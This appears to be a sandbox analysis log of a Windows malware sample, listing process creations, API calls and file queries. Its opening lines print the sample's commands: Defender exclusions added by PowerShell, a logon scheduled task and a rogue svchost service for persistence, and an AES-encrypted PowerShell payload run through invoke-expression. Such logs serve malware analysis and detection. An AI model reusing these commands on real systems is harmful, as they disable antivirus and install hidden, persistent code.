    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x338625\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x338625.dat" /f && sc start x338625
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x338625\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x338625.dat" /f && sc start x338625
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoA,46_2_68295290
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoA,46_2_682A1460
    Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,46_2_682864E0
    Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,46_2_68287D70
    Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,46_2_68286680
    Source: C:\Windows\System32\svchost.exeCode function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,46_2_00007FFA2CF14B70
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,46_2_00007FFA418731AC
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesEx,46_2_00007FFA41873674
    Source: C:\Windows\System32\svchost.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,46_2_00007FFA418814CC
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,46_2_00007FFA41881830
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,FormatMessageA,46_2_00007FFA41850830
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,46_2_00007FFA41873744
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,46_2_00007FFA41881900
    Source: C:\Windows\System32\svchost.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,46_2_00007FFA41873CA4
    Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,46_2_00007FFA41881D34
    Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,46_2_00007FFA41881F2C
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
